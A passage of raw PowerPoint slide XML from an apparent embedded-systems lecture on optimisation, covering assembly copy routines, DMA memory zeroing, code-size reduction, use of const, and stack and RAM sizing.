                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11267" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3276600"/>
            <a:ext cx="4267200" cy="31702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pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>copy16:</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      %r5,[%r1]</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      %r5,[%r0]</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      %r4,[%r1,4]</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      %r4,[%r0,4]</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ld_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    %r2,[%r1,8]</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st_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    %r2,[%r0,8]</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ld_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    %r3,[%r1,12]</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j_s.d</a:t>
            </a:r>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blink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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st_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    %r3,[%r0,12]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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87176745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 zero 256k of memory with DMA copy engine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Option 1 – don’t use DMA, just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> all memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Option 2 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> one chunk and copy every chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secret Option 3 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>memset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> one cache line and use DMA internal implementation property to do a single copy!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114245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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Optimizing for Size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114008986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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reducing Code Size (I)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="394243" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Avoid standard library routines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Many routines costly in size because they try to handle all possible cases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Also, even small standard library routines may call other, much larger ones.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Try to avoid large routines altogether, alternatively create reduced versions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Example: If you have no floats in program and want to use sprintf(), remove all code related to formatting of floats and doubles.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>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71215251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en-US" smtClean="0"/>
              <a:t>Reducing Code Size (II)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="395267" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Other techniques used for speed optimization, may also work. Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Lookup tables instead of switch blocks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reduces branch and jump statements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Hand-coded assembly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Register variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Saves load and store statements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Global variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reduces instructions for stack buffer pushes and pops.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291569412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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reducing Data (RAM) Size (I)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RAM size can be reduced by moving constant data out of it to other locations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In other words: Make sure that read-only data is mapped to ROM or FLASH / EEPROM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Will usually be done automatically by compiler if read-only data is declared as “const”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255663374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Use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>const</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>test=“TEST0”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main()</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 = test;</a:t>
            </a:r>
          </a:p>
          <a:p>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smtClean="0">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=0;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&lt;9;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[4]=‘0’+i;</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printf</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240254273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Use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>const</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>test=“TEST0”;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> main()</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 =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test;</a:t>
            </a:r>
          </a:p>
          <a:p>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smtClean="0">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=0;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&lt;9;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[4]=‘0’+i;</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printf</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268536325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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reducing Data (RAM) Size (II)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="397315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find out what stack size your program really needs. Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Initialize all stacks with arbitrary value, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 0xAAAA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run the program under maximum load.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When program ends, check all stacks – those that have noticeable amount of bytes with 0xAAAA may be reduced. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4145837361"/>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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reducing Data (RAM) Size (III)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Profile your program – it might not need to use all of the data all of the time. Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>If program needs to load user-data, and each user-data is up to 64K in size.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>There are a maximum of 10 users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Q: How much data size is needed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A: If at any given time only one user data needs to be handled, only 64K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Unload data which is not needed (as long as this doesn’t overcomplicate system design).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Additionally - If some data is not used frequently, don’t keep it in RAM all the time – it can be kept in other storage (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> FLASH) for most of its life time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
